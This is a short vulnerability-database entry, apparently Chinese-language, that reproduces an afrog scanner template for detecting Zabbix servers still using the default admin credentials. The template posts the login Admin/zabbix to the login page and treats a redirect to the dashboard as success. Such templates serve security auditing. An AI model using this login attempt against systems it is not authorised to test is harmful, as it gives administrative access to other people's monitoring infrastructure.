zabbix-default-password: Zabbix Default Password

日期: 2025-09-01 | 影响软件: Zabbix | POC: 已公开

漏洞描述

Zabbix default admin credentials were discovered.

PoC代码[已公开]

id: zabbix-default-password

info:
    name: Zabbix Default Password
    author: fuzz7j(https://github.com/fuzz7j)
    severity: high
    verified: true
    description: Zabbix default admin credentials were discovered.
    reference:
        - https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/

rules:
    r0:
        request:
            method: POST
            path: /index.php
            body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
        expression: response.status == 302 && response.headers["location"].contains("zabbix.php?action=dashboard.view")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/zabbix-default-password.yaml

相关漏洞推荐